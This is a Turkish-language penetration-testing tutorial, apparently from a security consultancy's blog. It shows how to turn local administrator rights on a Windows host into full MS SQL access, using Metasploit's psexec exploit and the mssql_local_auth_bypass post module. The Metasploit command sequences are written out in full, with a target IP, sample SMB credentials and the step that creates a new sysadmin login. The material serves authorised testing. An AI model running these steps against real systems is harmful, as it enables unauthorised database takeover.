Yerel Yönetici Hakları ile Meterpreter Oturumu Elde Edilen Bilgisayarda MSF mssql_local_auth_bypass Post Modülü Kullanılarak MS SQL Veritabanına Erişim Sağlanması

0
138
views
Sızma testlerinde MSSQL yüklü bilgisayarda yerel yönetici hakkına sahip olduktan sonra, veritabanına direk olarak erişime sahip olunamayabilir. Bu yazıda, MS SQL sunucu bilgisayarda yerel yönetici iken, uygulamaya giriş yapabilmek için MSF mssql_local_auth_bypass post modülü kullanılacaktır.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Mevcut durumda, yerel yönetici hakkı elde edilen bilgisayardaki MSSQL uygulamasında kimlik doğrulaması olarak Mixed Mod etkindir.

gaining-access-to-mssql-database-from-operating-system-privileges-by-using-msf-mssql-local-auth-bypass-post-module-01

Ele geçirilen bilgisayarda, yerel yönetici haklarına sahip olunmuştur.

whoami
net user hacked

gaining-access-to-mssql-database-from-operating-system-privileges-by-using-msf-mssql-local-auth-bypass-post-module-02

Ancak yerel yönetici hakları ile veritabanlarına erişim sağlanamamaktadır.

gaining-access-to-mssql-database-from-operating-system-privileges-by-using-msf-mssql-local-auth-bypass-post-module-03

MSF psexec gibi bir modül kullanılarak veya sosyal mühendislik yöntemleri kullanılarak yerel yönetici hakları ile Meterpreter kabuğu elde edilebilir.

use exploit/windows/smb/psexec
set RHOST 172.22.71.247
set SMBUSER Hacked
set SMBPASS Hh123456
exploit
getuid

gaining-access-to-mssql-database-from-operating-system-privileges-by-using-msf-mssql-local-auth-bypass-post-module-04

Elde edilen Meterpreter oturumunda, MSF mssql_local_auth_bypass post modülü ile veritabanında tam yetkiye sahip olunabilir. MSF mssql_local_auth_bypass post modülü aşağıdaki gibidir:

background
search mssql_local_auth_bypass
use post/windows/manage/mssql_local_auth_bypass
show options

gaining-access-to-mssql-database-from-operating-system-privileges-by-using-msf-mssql-local-auth-bypass-post-module-05

Post modül aşağıdaki gibi ayarlanabilir ve çalıştırılabilir:

set DB_USERNAME yeni_sa
set DB_PASSWORD yeni_sa_Mssql123
set SESSION 1
run

06gaining-access-to-mssql-database-from-operating-system-privileges-by-using-msf-mssql-local-auth-bypass-post-module-06

Oluşturulan yeni kullanıcı hesabı ile MSSQL üzerinde oturum açılabilmiştir.

gaining-access-to-mssql-database-from-operating-system-privileges-by-using-msf-mssql-local-auth-bypass-post-module-07

Veritabanında işlemler gerçekleştirildikten sonra oluşturulan hesabın (yeni_sa) silinmesi gerekmektedir. Silme işlemi Microsoft SQL Server Management Studio konsolundan gerçekleştirilebileceği gibi, MSF mssql_local_auth_bypass post exploitation modülündeki REMOVE_LOGIN seçeneğini “true” olarak değiştirilmesiyle aşağıdaki gibi de gerçekleştirilebilir:

use post/windows/manage/mssql_local_auth_bypass
set DB_USERNAME yeni_sa
set DB_PASSWORD RastgeleParola
set SESSION 1
set REMOVE_LOGIN true
run

gaining-access-to-mssql-database-from-operating-system-privileges-by-using-msf-mssql-local-auth-bypass-post-module-08

 

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.